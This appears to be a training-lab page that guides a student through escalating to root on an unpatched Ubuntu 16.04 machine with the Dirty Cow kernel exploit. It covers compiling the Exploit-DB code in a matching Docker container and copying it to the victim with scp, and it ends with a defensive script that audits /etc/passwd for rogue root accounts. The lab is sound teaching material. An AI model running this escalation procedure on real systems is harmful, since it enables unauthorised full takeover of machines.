Difficulty
intermediate
Average duration
2 hrs
Solution code
Technologies
linux
cybersecurity
penetration testing
red team
kernel exploit
The academy provides a virtual machine with a vulnerable version of Ubuntu Server (16.04.1), running a kernel affected by the Dirty Cow vulnerability (CVE-2016-5195).
As a student, you already have access to this system with a limited user called student. Your goal will be to identify that the system is vulnerable, compile and run a real exploit, and escalate your privileges to gain root access. This exercise simulates a realistic scenario where a local attacker, without administrative privileges, fully compromises the system by exploiting a kernel vulnerability. The objectives are:
g++, a compiler used to build and link programs written in C++, generating an executable from the source code.
root
./root
This type of exploitation is typical in advanced security audits and Red Team environments. It will help you connect low-level operating system concepts with real offensive techniques, in a practical and guided way.
Vulnerable Ubuntu machine with kernel 4.4.0-21-generic (or similar unpatched)
Access as a non-privileged user on the vulnerable machine (student:password123)
Kali Linux machine (Attacker). This is the machine where you will prepare the exploit, and it must have the following tools installed:
🔧 Docker: We will use Docker to launch an Ubuntu 16.04 container and compile the exploit with the same libraries as the victim machine. This ensures compatibility and avoids errors due to modern compiler or glibc versions.
🔧 g++: This is the C++ compiler. We will use it to compile the dirty.cpp exploit, which is written in this language. It allows us to generate an executable (dirty) from the source code.
🔧 scp (Secure Copy Protocol): This is a tool for securely copying files between Linux systems. We will use it to transfer the compiled exploit from Kali to the victim machine.
🚨 Legal Notice: This repository contains a clean and commented version of the Dirty Cow exploit (CVE-2016-5195), designed exclusively for educational purposes. This variant creates a new user with root privileges by exploiting a race condition in the Linux kernel memory subsystem. This exploit is for educational use only. It must be used in controlled and legal environments, such as labs, practice virtual machines, or cybersecurity classes.
Log in to the vulnerable machine with the limited user and run:
    uname -a
This returns something like:
    Linux dirtycow-lab 4.4.0-31-generic #50-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64
Note the version and research how to exploit that vulnerability using databases like Exploit-DB, GitHub, or searchsploit from Kali. For this exercise, we provide you with a functional and documented exploit that you can download here.
⚠️ IMPORTANT! The vulnerable machine does not have compilation tools installed, nor sudo permissions to add them. Therefore, we must compile the exploit on Kali, inside a Docker container with Ubuntu 16.04, which has the same versions of glibc, libstdc++, and system libraries as the vulnerable machine; otherwise, you may encounter version issues.
Install Docker on Kali:
    sudo apt update
    sudo apt install docker.io -y
    sudo systemctl start docker
    sudo systemctl enable docker
Download the Ubuntu 16.04 image:
    sudo docker pull ubuntu:16.04
Launch a container:
    sudo docker run -it --name compile-ubuntu16 ubuntu:16.04
Install compilation tools:
    apt update
    apt install build-essential libutil-dev -y
Create the file inside the container:
    nano dirty.cpp
(Paste the full exploit code from dirty.cpp provided by the academy or from Exploit-DB 40847)
Compile the binary:
    g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty dirty.cpp -lutil
Exit the container:
    exit
Copy the compiled binary from the container to Kali:
    sudo docker cp compile-ubuntu16:/dirty ./dirty
Transfer the binary to the victim:
    scp dirty student@<VICTIM_IP>:/home/student
On the victim, run it:
    chmod +x dirty
    ./dirty
If the exploit is successful, you will see a message telling you the password assigned to the root user.
root user.
/root/flag.txt directory. If everything worked correctly, you will see the flag's content.
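From the defender's side, the result described above (a new root-level user, or a password assigned to root) leaves a trace in the account database. The script below is an added example, not part of the lab or the academy's code: it audits a passwd-format file for extra UID 0 accounts and for password hashes stored inline instead of the usual "x". It assumes the change lands in /etc/passwd; the function names and the sample data are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the lab): flag passwd entries of the kind a
# privilege-escalation exploit that rewrites the account database leaves behind.

# audit_passwd FILE -> one finding per line, "<kind>:<account>"
audit_passwd() {
    awk -F: '
        /^#/ || $0 == "" { next }                      # skip comments and blanks
        NF != 7 { print "malformed:line" NR; next }    # passwd(5) has 7 fields
        $3 == 0 && $1 != "root" { print "uid0-extra:" $1 }
        $2 == "" { print "empty-password:" $1; next }
        # "x" defers to /etc/shadow; "*" and "!..." mark locked accounts.
        $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "inline-hash:" $1 }
    ' "$1"
}

# write_sample FILE: constructed data, not taken from a real system.
# Line 1 simulates a root entry whose "x" was replaced by a hash;
# line 4 simulates an added account that shares UID 0.
write_sample() {
    cat > "$1" <<'EOF'
root:EXAMPLEHASH:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
student:x:1000:1000::/home/student:/bin/bash
toor:x:0:0::/root:/bin/bash
EOF
}

sample=$(mktemp)
write_sample "$sample"
audit_passwd "$sample"
rm -f "$sample"
```

On a real host, run `audit_passwd /etc/passwd` and compare the file against a known-good backup or the package manager's baseline; any finding on a system that uses shadow passwords warrants investigation.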